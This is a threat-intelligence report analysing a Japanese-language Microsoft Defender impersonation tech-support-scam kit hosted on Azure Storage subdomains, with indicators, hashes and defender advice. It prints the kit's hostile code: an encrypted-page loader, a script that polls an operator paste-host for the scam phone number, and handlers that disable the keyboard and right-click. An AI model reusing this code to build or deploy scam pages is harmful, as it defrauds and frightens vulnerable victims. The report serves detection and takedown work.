Three Paste-Hosts, One HMAC Key, and 257 Azure Subdomains — Inside the 'edit_phone_number' Tech-Support-Scam Kit Targeting Japan
A Japanese-language Microsoft Defender impersonation kit fetches its phone number from a paste-host every 6 to 12 seconds. The encrypted body verifies with a 32-character HMAC key the operator hardcoded across every kit instance we have seen.
Initial lead from a researcher (campaign window 20–26 April 2026). The brief described it as a Japan-targeted tech-support-scam pushing fake Windows-upgrade pages on Azure-hosted URLs, and gave us the lure shape, three Azure landing URLs, and one phone number. The kit forensics, decryption recipe, three-backend rotation pool, and 257-subdomain footprint below are what we found pulling on that thread. If you have prior reporting on the
edit_phone_numberplaceholder pattern, on thea3928be5...HMAC key, or on the paste-host backendrealslimshady[.]net, please reach out — we will update and credit.
TL;DR
A Japanese-language tech-support-scam (TSS) kit family is being deployed across hundreds of Azure Storage static website subdomains, lured via emails that spoof microsoft-noreply[@]microsoft[.]com and use the subject 「【重要】Windowsセキュリティーシステムのアップグレード」 ("Important — Windows Security System Upgrade"). The landing pages impersonate Microsoft Defender / Windows Protection Center in fluent Japanese and tell the victim to call a phone number for "technical support."
The kit ships its phishing dialog as an AES-CBC-encrypted blob inside a <div style="display:none"> element, with the decryption key derived from the URL hash fragment and a HMAC-SHA256 verifying integrity. The HMAC key is the same 32 hex characters across every kit instance we have pulled. That single string is the operator-wide fingerprint.
The phone number itself is not in the kit. The kit fetches it from one of three operator-controlled paste-hosting backends every 6 to 12 seconds and substitutes it into the rendered text via a tree-walker. All three backends serve the same 7,546-byte "Secure Text Hosting" homepage from the same custom Go-style backend; one of the three (neconki[.]top) was registered through Spaceship the day before this post went out, suggesting an active rotation cycle as registrar abuse takedowns roll through.
We pulled and decrypted one live landing, mapped the rotation architecture, and counted 257 unique *.web.core.windows.net subdomains observed in public scan corpora — almost certainly an undercount, since urlscan only sees what people submit. Microsoft has already taken down most observed Azure landings. At least one live page remained at the time of writing.
| Item | Value |
|---|---|
| Lure | Microsoft Defender impersonation, Japanese (lang=ja-JP) |
| Spoofed sender | microsoft-noreply[@]microsoft[.]com |
| Kit cipher | AES-256-CBC, PKCS7, key from URL hash fragment, HMAC-SHA256 verified |
| Hardcoded HMAC key | a3928be5f5b6af086ad652a2fed39623 |
| Phone-fetch endpoint | /<key> on realslimshady[.]net / abrakadabra[.]it[.]com / neconki[.]top |
| Phone observed (rotates) | (0101) 47881-27410 (was (0101) 20836-17998 two days prior) |
| Audio asset | morning-alarm.mp3, SHA-256 2250b1...c26b06bc |
| Azure subdomains observed | 257 unique, across ≥25 z-zones |
| Direct-host backend | 5.182.87[.]132 (AS210644 Aeza Frankfurt — per RIPE whois April 2026 — US Treasury OFAC sanctioned July 2025) |
What This Report Adds to the Public Record
- The exact decryption recipe for the encrypted-body kit: AES-256-CBC with the URL-hash fragment as the key (NULL-padded to 32 bytes, Latin-1), and a hardcoded HMAC-SHA256 key
a3928be5f5b6af086ad652a2fed39623that allows operator-wide YARA-grade fingerprinting. - The decrypted plaintext (SHA-256
2589a5...0832cd5), pulled live from a still-up Azure landing on 2026-04-25, including the full Japanese-language Microsoft Defender impersonation copy and the anti-detection padding (random Wikipedia-style filler paragraphs hidden offscreen with zero-width-joiner homoglyph obfuscation). - The phone-number rotation architecture — a JavaScript tree-walker that fetches
/<key>from a paste-host every 6 to 12 seconds and substitutes the response into the rendered DOM, allowing the operator to change phone numbers globally without redeploying any of the hundreds of phishing pages. - The three-backend rotation pool:
realslimshady[.]net(direct on Aeza),abrakadabra[.]it[.]com(Cloudflare-fronted), andneconki[.]top(Cloudflare-fronted, registered through Spaceship on 2026-04-24 — the day before this post). All three serve the same custom "Secure Text Hosting" software, identical 7,546-byte homepage hash, identical/apimiddleware response, identical/<key>content. One operator, three redundant fronts. - A 257-host dedup of Azure Storage static website subdomains (
*.web.core.windows.net, the$webblob-container feature — note this is not Azure Static Web Apps, which uses*.azurestaticapps.net; thez<NN>storage-account zone in the hostname is the giveaway) referencing one of the three backends, with the heaviest deployment inz1(44 subdomains) and a long tail across 24 distinct storage zones. - Operator-side tells: the homepage auto-generates a
sales@<hostname>mailto link by readinglocation.hostnameat runtime, which suggests the paste-host software is being marketed (or self-served) as a product. The same 7,546-byte page renders on every backend regardless of domain.
This report does not assign a tracker name to the operator. The 20–26 April 2026 window aligns with the researcher's coverage of the same Japan-targeted Windows-upgrade tech-support scam on Azure-hosted URLs; tracker-level attribution is left to the broader research community.
The Lure
Emails arrive with a spoofed From: microsoft-noreply[@]microsoft[.]com header and the same Japanese subject line shown above. The body links to a randomly-named subdomain on Azure Storage static website — examples seen include rudecutug[.]z28[.]web[.]core[.]windows[.]net, rufawowop[.]z1[.]web[.]core[.]windows[.]net, tunibicat[.]z12[.]web[.]core[.]windows[.]net, and liwolapu[.]z36[.]web[.]core[.]windows[.]net.
The subdomain naming is operator-generated pseudo-Latin words — six to ten characters of consonant-vowel pattern (liwolapu, betotifi, migivivowo, cusowezin). They look like nothing in particular, which is the point.
The first hop is a 1,877-byte mobile-detection page. On a phone or tablet it shows 「PCからアクセスしてください」 ("Please access from PC"). On a desktop it location.replaces into the encrypted kit at a longer pseudo-random filename like /jh1rhvn3e7xs.html#t35IRPK02FGIBIkQ. The URL fragment after # is the AES key — without that fragment, the kit location.hrefs straight to about:blank. Anyone landing on the kit URL without the fragment, including most automated scanners, sees nothing.
The Kit — AES-CBC with the URL Hash as Key
The kit page is 52,525 bytes. Almost all of it is one base64-encoded blob inside a hidden <div>:
<div id="9t9jtf7" style="display:none;">I5GE08Xt6tCOBKD1Bq44mX04CJcH9wPD4saa8aYqpVGUs+8W9Pj88vT9...</div>
A 1,127-character inline script does the unwrap:
(function(){
var k5zg20 = document.getElementById("9t9jtf7").innerHTML,
bb8j6n = location.hash.slice(1);
if (!bb8j6n) { location.href = "about:blank"; return }
history.replaceState(null, null, location.pathname);
for (var wkri6 = bb8j6n; wkri6.length < 32;) wkri6 += String.fromCharCode(0);
wkri6 = wkri6.slice(0, 32);
var hmwy = CryptoJS.enc.Latin1.parse(wkri6),
cx994f6 = CryptoJS.enc.Latin1.parse("a3928be5f5b6af086ad652a2fed39623"),
nbiwcn = CryptoJS.enc.Base64.parse(k5zg20),
wre2z9g = nbiwcn.sigBytes,
y9gp4kc = CryptoJS.lib.WordArray.create(nbiwcn.words.slice(0, 4), 16),
lp0vzu = CryptoJS.lib.WordArray.create(nbiwcn.words.slice(4, (wre2z9g - 32) / 4), wre2z9g - 48),
hj9v = CryptoJS.lib.WordArray.create(nbiwcn.words.slice((wre2z9g - 32) / 4), 32);
if (CryptoJS.enc.Hex.stringify(hj9v) ===
CryptoJS.enc.Hex.stringify(CryptoJS.HmacSHA256(y9gp4kc.concat(lp0vzu), cx994f6))) {
try {
var wv71 = CryptoJS.AES.decrypt({ciphertext: lp0vzu}, hmwy,
{iv: y9gp4kc, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7})
.toString(CryptoJS.enc.Utf8);
wv71 ? (document.open(), document.write(wv71), document.close())
: location.href = "about:blank";
} catch (ktph6) { location.href = "about:blank" }
} else { location.href = "about:blank" }
})()
The blob layout is IV(16 bytes) ‖ ciphertext(N) ‖ HMAC(32 bytes), base64-encoded. The decrypt side keys AES-256-CBC with the URL hash NULL-padded to 32 bytes. Before decrypting, the script verifies HMAC-SHA256 over IV ‖ ciphertext with a hardcoded second key — a3928be5f5b6af086ad652a2fed39623 — which is also 32 ASCII characters parsed as Latin-1 bytes.
That second key is the operator's mistake. Instead of deriving it from the URL fragment too, or rotating it per deploy, they hardcoded one value into the kit builder. Every page we have pulled from this builder embeds that exact string. A grep for a3928be5f5b6af086ad652a2fed39623 across any HTML corpus that includes the inline JS will find every other deployment.
We tested both Shodan (http.html:) and urlscan (page.text:) for that key. Both returned zero hits — Shodan does not crawl Azure Storage static website content because the per-tenant pages are not reachable at the IP layer they enumerate, and urlscan indexes rendered visible text rather than JS source. Other corpora (Censys raw HTML, GitHub code search, the Google index) did not surface it either. The pivot is real but it needs an HTML-source corpus that includes the inline script. urlscan submission text-search via the paste-host references gave the operator-wide map by proxy.
A drop-in Python decrypter, given the kit HTML and the URL hash, looks like this:
import base64, hashlib, hmac, re
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def decrypt_kit(html: str, url_hash: str) -> bytes:
blob = re.search(r'<div id="[^"]+" style="display:none;">([A-Za-z0-9+/=]+)</div>', html).group(1)
raw = base64.b64decode(blob)
iv, ct, mac = raw[:16], raw[16:-32], raw[-32:]
if not hmac.compare_digest(
mac,
hmac.new(b"a3928be5f5b6af086ad652a2fed39623", iv + ct, hashlib.sha256).digest()
):
raise ValueError("HMAC mismatch")
key = (url_hash.encode("latin-1") + b"\x00" * 32)[:32]
return unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ct), 16, "pkcs7")
Run that against a captured kit HTML with the right URL fragment and you get the rendered Japanese phishing page in plaintext. The HMAC verification fails fast on tampered or partial captures, so the function is also a reasonable kit-detector.
The Decrypted Phishing Page
The plaintext (37,229 bytes, SHA-256 2589a5...0832cd5) is a textbook Microsoft Defender impersonation done in fluent Japanese. The rendered visible content boils down to:
- A fake scan progress sequence: 「ライセンスの検証処理」, 「シグネチャの照合中」, 「RAM使用量の分析」, 「ブート項目の検査」, 「システム変数の検証」, 「ディスク領域の検証中」.
- A red 「緊急脅威アラート」 ("Emergency Threat Alert") panel claiming the device has been hijacked by ransomware and that authentication tokens, financial logins, social-media credentials, and saved documents have been "compromised."
- A persistent CTA: 「今すぐテクニカルサポートにお電話ください」 ("Call technical support immediately") followed by the placeholder text
edit_phone_number, which the rotation script replaces with the live phone number on a 6-to-12-second loop. - Brand strings rotated through the page: 「PC防御センター」, 「Windows保護センター」, 「Defender 脅威防御センター」.
The page autoplays fragments/morning-alarm.mp3 (173,974 bytes, 22.05 kHz mono, MPEG ADTS layer-3 v2 56 kbps) on load — a continuous siren-like tone designed to add urgency. It also sets cursor: none on <body> and disables both the right-click context menu and keydown events:
document.addEventListener("contextmenu", function(e){e.preventDefault(); return false});
document.onkeydown = function(e){return false};
The cursor-hide and key-disable combination is a recurring TSS pattern designed to make the victim feel trapped on the page and reach for the phone. It is not a technical lock — Alt-F4 still works, browser-tab-close still works — but for a less-technical Japanese-speaking target, particularly an older one, the pattern is effective.
The Anti-Detection Padding
Interspersed throughout the decrypted page are short Wikipedia-style paragraphs about unrelated topics: "Fast Fashion Rise," "Canvas Stretching Method," "Grafting Fruit Trees," "Wetland Water Filtration," "Walking Tour Navigation," "Great Wall Construction," "Ethics of Care," "Art Deco Geometric Patterns," "Panopticon Metaphor," "Dwarf Planet Definition," "Natural Light Direction." Each is a few sentences of plausible encyclopedic prose. Each is hidden offscreen with position:absolute;transform:translateX(-10000px);width:1px;height:1px;overflow:hidden.
Both the Japanese phishing copy and the English decoy paragraphs are obfuscated with zero-width Unicode joiners (U+200C, U+200D, U+FEFF) inserted between characters. Fast Fashion Rise is rendered identically to Fast Fashion Rise in a browser but differs at the byte level — a basic but useful trick against naive substring scanners.
The decoy paragraph list is a solid YARA-grade fingerprint on its own: any one of those phrase combinations in offscreen padding is enough to flag a kit instance.
The Phone-Number Rotation
The kit's rotation script, also inline at the bottom of every page, is small:
(function(){
var U = "https://realslimshady.net/jpmaclaud",
K = "edit_phone_number";
function run(){
fetch(U, {cache:"no-store"})
.then(function(r){return r.text()})
.then(function(v){
v = v.trim();
if (!v) return;
var tw = document.createTreeWalker(document.body, NodeFilter.SHOW_TEXT);
while (tw.nextNode())
if (tw.currentNode.nodeValue.includes(K))
tw.currentNode.nodeValue = tw.currentNode.nodeValue.replaceAll(K, v);
});
}
run();
setInterval(run, Math.floor(Math.random() * 6001) + 6000);
})();
It fetches realslimshady[.]net/jpmaclaud once on load, then again every 6 to 12 seconds (Math.random()*6001 + 6000 ms). Each response is a short text string — currently (0101) 47881-27410. The walker substitutes edit_phone_number into the rendered DOM with whatever the paste-host returns.
Note: that displayed number is not a valid Japanese phone format. Real Japanese numbers begin with 0 plus an actual area code (03 Tokyo, 06 Osaka, 045 Yokohama, or 090/080/070 for mobile) and run 9–11 digits. (0101) 47881-27410 is 14 digits with a non-existent 0101 prefix. It is most likely either a VoIP/forwarding number routed through a foreign carrier, or a deliberately weird display string the kit uses purely for visual urgency rather than for the click-to-call to actually dial. We did not call it.
That design lets the operator change phone numbers on the fly without touching a single Azure deployment. We watched the same key /jpmaclaud for two days and saw the number change from (0101) 20836-17998 (per the researcher's brief from 2026-04-23) to (0101) 47881-27410 (today). The operator updated the paste once; every one of the hundreds of live kits picked up the new number on its next 6-second tick.
The Three Paste-Host Backends
realslimshady[.]net is one of three operator-controlled paste-hosts in active rotation. The TSS-kit JavaScript currently embeds realslimshady[.]net as the primary backend, but the lure infrastructure also references abrakadabra[.]it[.]com and a third backend, neconki[.]top, that was registered the day before this post.
All three serve the same 7,546-byte "Secure Text Hosting" homepage. Same DOM hash. Same CSS. Same dynamic sales@<hostname> mailto link generated client-side from location.hostname. Same /api/* middleware that returns {"error":"missing authorization header"} (HTTP 401, 41 bytes) for every path before routing — /api, /api/list, /api/all, /api/keys, /api/auth, /api/login all return identically. Same Allow: GET 405 response for POST/PUT/PATCH to /<key>. Same nginx-1.18.0-on-Ubuntu front. Same X-Ratelimit-Limit: 200 per ~2-hour window.
| Backend | Hosting | First seen | Status |
|---|---|---|---|
realslimshady[.]net | Direct on 5.182.87[.]132 (AS210644 Aeza Frankfurt per RIPE whois April 2026) | older | live, port 80 only |
abrakadabra[.]it[.]com | Cloudflare-fronted (anycast 104.21.0[.]0/20 + 172.67.0[.]0/16; resolved IPs vary by vantage point) | older | live |
neconki[.]top | Cloudflare-fronted (anycast 188.114.96[.]0/22) | registered 2026-04-24 via Spaceship | live, fresh rotation |
5.182.87[.]132 is on AS210644 (per RIPE whois April 2026) — the same Aeza network that the US Treasury OFAC sanctioned on July 1, 2025 for hosting commodity malware infrastructure. Silent Push reported Aeza migrating IPs from AS210644 to AS211522 (Hypercore LTD) starting July 2025; this specific host has not yet moved, but the announcement may shift, so confirm via current BGP if you're using the ASN as an indicator. Aeza's reputation as a takedown-unresponsive host makes it the natural anchor for the operator's redundancy: even when Cloudflare suspends abrakadabra[.]it[.]com or neconki[.]top, the Aeza-hosted realslimshady[.]net stays up, the kits still fetch their phone numbers, and the campaign continues uninterrupted while the operator registers the next Cloudflare-fronted front.
The neconki[.]top registration on 2026-04-24 — through Spaceship, a registrar that has emerged in 2025-2026 as a low-friction alternative to Namecheap — is the most operationally useful tell in this set. It says the operator is still actively iterating, registering new fronts as the older ones get reported. A Spaceship abuse complaint against neconki[.]top, filed alongside the Cloudflare phishing report, is the right move.
The "Secure Text Hosting" Software
The operator did not write this paste-host software for this campaign. The product nature — auto-generated sales@<hostname> from location.hostname, identical 7,546-byte homepage on every domain, structured /api/* middleware with rate limiting and proper security headers (HSTS, X-Frame-Options: DENY, X-Content-Type-Options: nosniff, Vary: Origin), and a robots.txt that does User-agent: * Disallow: / — reads like a SaaS or open-sourced product marketed to anyone running a paste service.
We could not find the software's name or source via Shodan title search, urlscan title search, or GitHub code search for the unique inline-JS strings. The Secure Text Hosting title-search on urlscan returns 39 page captures, but only across two domains: realslimshady[.]net and neconki[.]top. (Cloudflare-fronted scans of abrakadabra[.]it[.]com register against the front, not the title.) The single Shodan host with that title is 5.182.87[.]132 — the same Aeza host. Either the software is rare and operator-developed for personal SaaS use, or it ships under a different brand name that does not include "Secure Text Hosting" in the page title by default.
Either way, the operator is running it identically on three domains and rotating new ones in. Defenders should treat the page-title string Secure Text Hosting plus the 7,546-byte homepage hash as a high-confidence indicator of an operator-controlled paste-rotation backend, regardless of the domain it is served from.
The Azure Footprint — 257 Subdomains
urlscan public submissions referencing one of the three paste-host backends total 5,183 over recent weeks (3,028 for realslimshady[.]net, 2,078 for abrakadabra[.]it[.]com, and 77 for neconki[.]top in the <24 hours since registration). Deduplicated to unique Azure Storage static website subdomains (the $web blob-container feature on *.web.core.windows.net), that resolves to 257 distinct hosts.
The z-zone distribution matches Azure storage account placement across regions (exact counts from the dedup):
| Storage zone | Subdomains | Storage zone | Subdomains |
|---|---|---|---|
z1 | 44 | z6 | 9 |
z12 | 16 | z22 | 9 |
z36 | 16 | z38 | 9 |
z16 | 12 | z4 | 8 |
z13 | 11 | z27 | 8 |
z5 | 10 | z31 | 8 |
z9 | 10 | z43 | 8 |
z14 | 10 | z11 | 7 |
z20 | 10 | z19 | 7 |
z33 | 10 | z21 | 7 |
z7 | 9 | z23 | 7 |
z28 | 5 | z32 | 7 |
z1 is the default Azure Storage static website suffix and the operator's heaviest deployment zone, but the campaign reaches across 24 distinct zones. That suggests the operator is provisioning storage accounts across multiple Azure regions and subscriptions to spread takedown risk.
The 257 figure is almost certainly an undercount. urlscan only sees what humans (and a handful of automated submitters) report; the kit-page subdomains the operator generated but never had submitted to urlscan are invisible to this pivot. The actual operator footprint could comfortably be five times larger.
By the time of writing, three of the four Azure landings named in the original researcher's brief had already been removed (rudecutug[.]z28, rufawowop[.]z1, tunibicat[.]z12). The fourth (liwolapu[.]z36) remained live, and a random-sample fetch of betotifi[.]z21[.]web[.]core[.]windows[.]net from our 257-host list confirmed the same kit pattern was still serving — including the same encrypted body sha256 — on a subdomain Microsoft had not yet seen.
What Defenders Can Do
For operators of mail gateways and DNS sinkholes:
- Block traffic to
realslimshady[.]net,abrakadabra[.]it[.]com,neconki[.]top. The kit cannot rotate its phone number without one of these reachable. - Watch for, and block at the egress layer, any outbound HTTP request whose path is
/<key>returning under 25 bytes oftext/plainfrom one of those three domains; the rotation pull pattern is distinctive. - Sinkhole or block freshly-registered domains that match
[a-z]{6,12}\.(top|cc|online|it\.com|net)and whose DNS resolves to Cloudflare or to AS210644 Aeza, when they appear in mail content alongside an Azure Storage static website URL.
For Azure tenants and incident responders:
- Do not assume
*.web.core.windows.nettraffic is always benign. The operator is using stock Azure Storage static website endpoints to host the kit, with no custom domain in front. TheServer: ECAcc (...)HTTP response signature and the lack of branded redirect mean network-level inspection has to look at the request body, not just the host. - Microsoft accepts abuse reports at
abuse@microsoft.comandmsrc@microsoft.com. Because the operator uses many storage accounts, the highest-leverage ask is for Microsoft to query their own usage records for storage accounts whose public web endpoint references either of the three paste-hosts and suspend them in bulk.
For analysts triaging similar TSS samples:
- If the kit page title is
報告 [U####], with brand stringsPC防御センター,Windows保護センター, orDefender 脅威防御センター, and you see a hidden<div>with a long base64 blob plus inlineCryptoJS.HmacSHA256references, run the decryption recipe above with the URL fragment as the AES key anda3928be5f5b6af086ad652a2fed39623as the HMAC key. If HMAC verifies, you are looking at a sibling kit instance. - The decoy paragraph list ("Fast Fashion Rise," "Canvas Stretching Method," etc.) is a strong fingerprint on its own. A YARA rule that matches three or more of those phrases inside
style="...translateX(-10000px)..."blocks will catch the kit family even if the operator rotates the HMAC key in a future build.
Indicators
Hosts and domains (defanged)
| Type | Value | Role |
|---|---|---|
| IP | 5.182.87[.]132 | Aeza Frankfurt, direct host for realslimshady[.]net (AS210644 per RIPE whois April 2026 — US OFAC sanctioned July 2025) |
| Domain | realslimshady[.]net | Paste-host backend, direct on Aeza |
| Domain | abrakadabra[.]it[.]com | Paste-host backend, Cloudflare-fronted |
| Domain | neconki[.]top | Paste-host backend, Cloudflare-fronted, registered 2026-04-24 via Spaceship |
| URL | hxxps://realslimshady[.]net/jpmaclaud | Phone-number paste, primary fetch in current kit JS |
| URL | hxxps://abrakadabra[.]it[.]com/jpmaclaud | Phone-number paste, alternate backend |
| URL | hxxps://neconki[.]top/jpmaclaud | Phone-number paste, fresh backend |
| Phone | (0101) 20836-17998 | Phone shown to victims 2026-04-23 (per researcher) |
| Phone | (0101) 47881-27410 | Phone shown to victims 2026-04-25 |
Azure landings (defanged, examples — 257 total observed)
liwolapu[.]z36[.]web[.]core[.]windows[.]net (live as of 2026-04-25)
betotifi[.]z21[.]web[.]core[.]windows[.]net (live as of 2026-04-25, sample-confirmed)
rudecutug[.]z28[.]web[.]core[.]windows[.]net (taken down)
rufawowop[.]z1[.]web[.]core[.]windows[.]net (taken down)
tunibicat[.]z12[.]web[.]core[.]windows[.]net (taken down)
migivivowo[.]z20[.]web[.]core[.]windows[.]net
docowafiwo[.]z1[.]web[.]core[.]windows[.]net
zufovabofi[.]z27[.]web[.]core[.]windows[.]net
zowefesabo[.]z43[.]web[.]core[.]windows[.]net
yedadawer[.]z1[.]web[.]core[.]windows[.]net
bibufiraye[.]z31[.]web[.]core[.]windows[.]net
mibefatu[.]z33[.]web[.]core[.]windows[.]net
badeseti[.]z38[.]web[.]core[.]windows[.]net
sayavesuwi[.]z20[.]web[.]core[.]windows[.]net
beroleziva[.]z1[.]web[.]core[.]windows[.]net
... (242 more)
Reach out if you want the full deduped 257-host list.
Hashes
| Artifact | SHA-256 |
|---|---|
Encrypted kit page (liwolapu/jh1rhvn3e7xs.html) | b497e0bf25a301827ac91960ee620c83c2ac1f9a1866ebcc28d00999b8793dc1 |
| Decrypted plaintext | 2589a5798738592a7f4ff775dab892e79c3b5c50fe549bc60bc376c4b0832cd5 |
morning-alarm.mp3 audio asset | 2250b12957834d0e9f3ab6e7b296b9b25b6d0a292ffdd22fcf4b5842c26b06bc |
Mobile-detect landing (liwolapu//) | ac91aa6705e591be9feacdb05e7f6c16d35bcbc1be042e44e70143be8382d44c |
Email lure
From: microsoft-noreply[@]microsoft[.]com (spoofed)
Subject: 【重要】Windowsセキュリティーシステムのアップグレード
Kit fingerprint strings
a3928be5f5b6af086ad652a2fed39623 (hardcoded HMAC key)
edit_phone_number (placeholder for live phone substitution)
viewParams = 'edit_phone_number' (kit boot script variable)
報告 [U####] (page title format)
PC防御センター (brand impersonation string)
Windows保護センター (brand impersonation string)
Defender 脅威防御センター (brand impersonation string)
fragments/morning-alarm.mp3 (autoplay audio path)
Decoy padding phrases (any three or more co-occurring inside transform:translateX(-10000px) blocks is a high-confidence kit indicator):
Fast Fashion Rise Canvas Stretching Method Grafting Fruit Trees
Wetland Water Filtration Walking Tour Navigation Great Wall Construction
Ethics of Care Art Deco Geometric Patterns Panopticon Metaphor
Dwarf Planet Definition Natural Light Direction
Closing Notes
The interesting thing about this kit is not the fake Defender page — those are commodity. It is the architectural choice to put the phone number behind a 6-second-polled paste-host so it can be rotated without redeploying any of the actual phishing pages. A defender who blocks the visible Azure landing buys five minutes of relief; a defender who blocks the paste-host kills the entire campaign at once.
The hardcoded HMAC key is the operator's biggest mistake. The decoy-paragraph reuse is the second. Either one is enough to write a YARA rule that catches sibling deployments. Both together make this kit family trivially trackable across whatever Azure subdomains the operator stands up next.
If you have a corpus that includes raw HTML source — Censys, an internal scanner archive, or a YARA-on-the-pipe setup — and you want to confirm or extend the 257-subdomain count, the inline-JS string a3928be5f5b6af086ad652a2fed39623 is the right starting point. Reply or DM if you find more sibling deployments, sibling paste-host backends, or — particularly — the source for the "Secure Text Hosting" software that this operator is running on three domains.
Breakglass Intelligence — "One indicator. Total infrastructure."
Initial lead courtesy of a researcher (campaign window 20–26 April 2026).